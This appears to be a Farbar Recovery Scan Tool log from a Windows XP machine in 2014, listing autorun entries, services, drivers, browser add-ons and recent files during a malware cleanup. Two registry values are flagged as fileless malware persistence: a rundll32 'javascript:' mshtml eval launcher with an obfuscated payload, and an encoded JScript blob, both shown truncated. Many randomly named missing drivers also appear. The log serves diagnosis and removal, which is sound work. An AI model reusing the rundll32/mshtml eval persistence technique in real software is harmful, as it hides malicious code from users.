(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128232 2009-02-04] (CyberLink Corp.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [ToolboxFX] => C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe [58936 2010-10-25] (Hewlett-Packard Company)
HKLM\...\Run: [SpyHunter Security Suite] => C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe [6434176 2014-01-09] (Enigma Software Group USA, LLC.)
HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1044480 2008-07-15] (Analog Devices, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [Malwarebytes' Anti-Malware] => C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe [449608 2011-08-31] (Malwarebytes Corporation)
HKLM\...\Run: [Intuit SyncManager] => C:\Program Files\Common Files\Intuit\Sync\IntuitSyncManager.exe [2786104 2013-05-31] (Intuit Inc. All rights reserved.)
HKLM\...\Run: [hpbdfawep] => C:\Program Files\HP\Dfawep\bin\hpbdfawep.exe [954368 2007-04-25] ()
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_winlogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\GoToMyPC: C:\Program Files\Citrix\GoToMyPC\G2WinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\intelsusb: ntusbw32.dll [X]
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] #@~^wH4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+*    Y.zPhxlc3XwC    NAx\bDKU:xO?DDrUT/ (the data entry has 32372 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
HKU\.DEFAULT\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe [839560 2014-01-01] (Adobe Systems Incorporated)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-24] (Google Inc.)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [Starfield Updater] => C:\Program Files\Workspace\WorkspaceUpdate.exe [35008 2014-09-01] (Starfield Technologies)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [InbitIMC] => C:\Program Files\24im\24im Messenger\IMC.EXE [3423744 2013-07-08] (24im LLC)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
ShellIconOverlayIdentifiers: off0 -> {8E33AEC3-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)
ShellIconOverlayIdentifiers: off1 -> {8E33AEC4-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.live.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USREL/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.msn.com/sphome.aspx
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.7.9012.1008\swg.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {051FE707-9706-11D5-A836-000102A7C938} http://certificates.amadeusvista.com/sgwadmin/common/AutoUpdateATL26P520.CAB
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} http://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: {469C92F9-CA8E-4C3E-9AD4-F74EEF097BCA} http://diagnostic.amadeus.com/travelagencies/Cabs/DS_Diagnostic.cab
DPF: {5CCB8990-66EF-4466-B051-CD27FA3821DF} http://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1251711551578
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} http://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: {B3E32D88-8E7F-468F-B0E2-3A300FD4A82C} http://myitlab.pearsoned.com/Pegasus/Modules/SIMIntegration/Resources/ax/stub.cab
DPF: {C9E2242D-DC05-4C54-9483-A5C90653F7BC} https://techinline.net/Client/TIClient.cab
DPF: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {DE625294-70E6-45ED-B895-CFFA13AEB044} http://80.179.197.227/activex/AMC.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://ncr.webex.com/client/WBXclient-T27L10NSP32EP1-13926/webex/ieatgpc.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {E90EF4C9-1476-4C49-B926-97C7D9D30A06} http://certificates.amadeusvista.com/certificateinfo/CCCert_Info.CAB
DPF: {F96020DD-C373-44A0-82B6-064EF0AEEAE3} http://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2006\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL (Microsoft Corporation)
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{03F00D1D-4288-4901-A4C3-F42AA00B1C9A}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1

FireFox:
========
FF ProfilePath: C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Documents and Settings\LW\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @starfield.com/off -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin HKCU: @starfield.com/wbe -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npwbe.dll (Starfield Technology, LLC)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFFICE.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npwbe.dll (Starfield Technology, LLC)
FF Extension: WBE Paste - C:\Documents and Settings\LW\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\wbepaste@starfield [2014-09-01]
FF Extension: Firefox Old Version Update Hotfix - C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-31]
FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff
FF Extension: Java Quick Starter - C:\Program Files\Java\jre6\lib\deploy\jqs\ff [2009-08-22]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-12-27]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-01-01]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR CustomProfile: C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-24]
CHR Extension: (Google Drive) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-24]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-31]
CHR Extension: (YouTube) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-24]
CHR Extension: (Google Search) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-24]
CHR Extension: (Google Wallet) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-24]
CHR Extension: (Gmail) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-24]
CHR HKLM\...\Chrome\Extension: [./0123456789:;<=>?@ABCDEFGHIJKLM] - C:\Documents and Settings\Lazer\Local Settings\Application Data\¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 Amadeus Automatic Update; C:\Program Files\Automatic Update\AutoUpdate.exe [236384 2013-03-28] (Amadeus)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1341664 2013-03-04] (ESET)
S2 File Backup; C:\Program Files\Workspace\offSyncService.exe [1187040 2013-07-22] (Starfield Technologies)
R2 GoToAssist Remote Support Customer; C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe [610888 2014-06-18] (Citrix Online, a division of Citrix Systems, Inc.)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-01-30] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [145920 2010-10-25] (HP) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre6\bin\jqs.exe [153376 2009-07-25] (Sun Microsystems, Inc.)
S2 MBAMService; C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe [366152 2011-08-31] (Malwarebytes Corporation)
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-05-31] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2012-01-10] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2012-01-10] (Intuit Inc.) [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
S2 intelusb3; C:\WINDOWS\system32\inusbw32.dll [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
S3 BVRPMPR5; C:\WINDOWS\system32\drivers\BVRPMPR5.SYS [49904 2009-08-25] (Avanquest Software) [File not signed]
R1 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [161368 2013-01-10] (ESET)
R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [122240 2013-01-10] (ESET)
R1 epfwtdir; C:\WINDOWS\System32\DRIVERS\epfwtdir.sys [105784 2013-01-10] (ESET)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [12288 2014-01-07] ()
S3 EsgScanner; C:\WINDOWS\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
R3 HPFXBULKLEDM; C:\WINDOWS\System32\drivers\hppcbulkio.sys [20504 2010-12-14] (Hewlett Packard)
R3 HPFXFAX; C:\WINDOWS\System32\drivers\hppcfaxio.sys [21528 2010-12-14] (Hewlett Packard)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [176640 2008-06-19] (Broadcom Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [22216 2011-08-31] (Malwarebytes Corporation)
R2 monblanking; C:\WINDOWS\System32\DRIVERS\monblanking.sys [29280 2014-01-30] (Citrix Systems, Inc.)
R0 SFAUDIO; C:\WINDOWS\System32\drivers\sfaudio.sys [24064 2008-07-15] (Sonic Focus, Inc)
U3 .serial; \? [X]
S1 aiihtvcz; \??\C:\WINDOWS\system32\drivers\aiihtvcz.sys [X]
S1 ailnikoh; \??\C:\WINDOWS\system32\drivers\ailnikoh.sys [X]
S1 aodyekkc; \??\C:\WINDOWS\system32\drivers\aodyekkc.sys [X]
S1 aqtnxesc; \??\C:\WINDOWS\system32\drivers\aqtnxesc.sys [X]
S1 btrkhckt; \??\C:\WINDOWS\system32\drivers\btrkhckt.sys [X]
S1 cehdbmir; \??\C:\WINDOWS\system32\drivers\cehdbmir.sys [X]
S3 cpuz136; \??\C:\DOCUME~1\LW\LOCALS~1\Temp\cpuz136\cpuz136_x32.sys [X]
S1 crmhksvq; \??\C:\WINDOWS\system32\drivers\crmhksvq.sys [X]
S1 dcphysdl; \??\C:\WINDOWS\system32\drivers\dcphysdl.sys [X]
S1 dctzhdkr; \??\C:\WINDOWS\system32\drivers\dctzhdkr.sys [X]
S1 dhsjwnsa; \??\C:\WINDOWS\system32\drivers\dhsjwnsa.sys [X]
S1 diiedivm; \??\C:\WINDOWS\system32\drivers\diiedivm.sys [X]
S1 dkqlfxtu; \??\C:\WINDOWS\system32\drivers\dkqlfxtu.sys [X]
S1 dywxjbpu; \??\C:\WINDOWS\system32\drivers\dywxjbpu.sys [X]
S1 elanvibc; \??\C:\WINDOWS\system32\drivers\elanvibc.sys [X]
S1 elueucdm; \??\C:\WINDOWS\system32\drivers\elueucdm.sys [X]
S1 emqorjrh; \??\C:\WINDOWS\system32\drivers\emqorjrh.sys [X]
S1 ffwjjktp; \??\C:\WINDOWS\system32\drivers\ffwjjktp.sys [X]
S1 fuwdcpag; \??\C:\WINDOWS\system32\drivers\fuwdcpag.sys [X]
S1 gjqdovsr; \??\C:\WINDOWS\system32\drivers\gjqdovsr.sys [X]
S1 hdzpacyh; \??\C:\WINDOWS\system32\drivers\hdzpacyh.sys [X]
S1 hkjraftu; \??\C:\WINDOWS\system32\drivers\hkjraftu.sys [X]
S1 hkqzjurj; \??\C:\WINDOWS\system32\drivers\hkqzjurj.sys [X]
S1 hudgwneh; \??\C:\WINDOWS\system32\drivers\hudgwneh.sys [X]
S1 hwnaxqhi; \??\C:\WINDOWS\system32\drivers\hwnaxqhi.sys [X]
S1 icjfktdr; \??\C:\WINDOWS\system32\drivers\icjfktdr.sys [X]
S1 ifcaadgw; \??\C:\WINDOWS\system32\drivers\ifcaadgw.sys [X]
S1 iojgrniz; \??\C:\WINDOWS\system32\drivers\iojgrniz.sys [X]
S1 itdfmkmf; \??\C:\WINDOWS\system32\drivers\itdfmkmf.sys [X]
S1 izuejwga; \??\C:\WINDOWS\system32\drivers\izuejwga.sys [X]
S1 jkysozto; \??\C:\WINDOWS\system32\drivers\jkysozto.sys [X]
S1 jneissmq; \??\C:\WINDOWS\system32\drivers\jneissmq.sys [X]
S1 jumggzng; \??\C:\WINDOWS\system32\drivers\jumggzng.sys [X]
S1 kbuuifwp; \??\C:\WINDOWS\system32\drivers\kbuuifwp.sys [X]
S1 krsrhnrw; \??\C:\WINDOWS\system32\drivers\krsrhnrw.sys [X]
S1 lksnxksg; \??\C:\WINDOWS\system32\drivers\lksnxksg.sys [X]
S1 lxnsddjw; \??\C:\WINDOWS\system32\drivers\lxnsddjw.sys [X]
S1 nmarzldd; \??\C:\WINDOWS\system32\drivers\nmarzldd.sys [X]
S1 oyqnomxu; \??\C:\WINDOWS\system32\drivers\oyqnomxu.sys [X]
S1 oznnujzj; \??\C:\WINDOWS\system32\drivers\oznnujzj.sys [X]
S1 pqebwcvo; \??\C:\WINDOWS\system32\drivers\pqebwcvo.sys [X]
S1 pxjpomgz; \??\C:\WINDOWS\system32\drivers\pxjpomgz.sys [X]
S1 qbjxztan; \??\C:\WINDOWS\system32\drivers\qbjxztan.sys [X]
S1 qdqqqeox; \??\C:\WINDOWS\system32\drivers\qdqqqeox.sys [X]
S1 qtiughlc; \??\C:\WINDOWS\system32\drivers\qtiughlc.sys [X]
S1 qvndeefi; \??\C:\WINDOWS\system32\drivers\qvndeefi.sys [X]
S1 rvweqwzh; \??\C:\WINDOWS\system32\drivers\rvweqwzh.sys [X]
S1 rycglvcj; \??\C:\WINDOWS\system32\drivers\rycglvcj.sys [X]
S1 spsewroy; \??\C:\WINDOWS\system32\drivers\spsewroy.sys [X]
S1 tddacvcd; \??\C:\WINDOWS\system32\drivers\tddacvcd.sys [X]
S1 tqolobyj; \??\C:\WINDOWS\system32\drivers\tqolobyj.sys [X]
S1 uxqezgeh; \??\C:\WINDOWS\system32\drivers\uxqezgeh.sys [X]
S1 vdmrhszs; \??\C:\WINDOWS\system32\drivers\vdmrhszs.sys [X]
S1 vxgwctzc; \??\C:\WINDOWS\system32\drivers\vxgwctzc.sys [X]
S1 wlkiibdz; \??\C:\WINDOWS\system32\drivers\wlkiibdz.sys [X]
S1 wnhyorkd; \??\C:\WINDOWS\system32\drivers\wnhyorkd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 12:29 - 2014-09-01 12:34 - 00000000 ____D () C:\FRST
2014-09-01 11:50 - 2014-09-01 11:50 - 00000310 _____ () C:\WINDOWS\Tasks\HP WEP.job
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:38 - 2014-09-01 11:39 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:38 - 2014-09-01 11:39 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 12:15 - 00045939 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 10:57 - 2014-09-01 11:37 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 00:02 - 2014-09-01 11:33 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:53 - 2014-08-31 23:54 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:31 - 2014-08-31 23:43 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:24 - 2014-09-01 10:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:09 - 2014-08-31 21:12 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 19:52 - 2014-09-01 10:59 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-08-31 19:52 - 2014-08-31 23:04 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 19:52 - 2014-08-31 20:27 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 19:52 - 2014-08-31 20:24 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 19:52 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
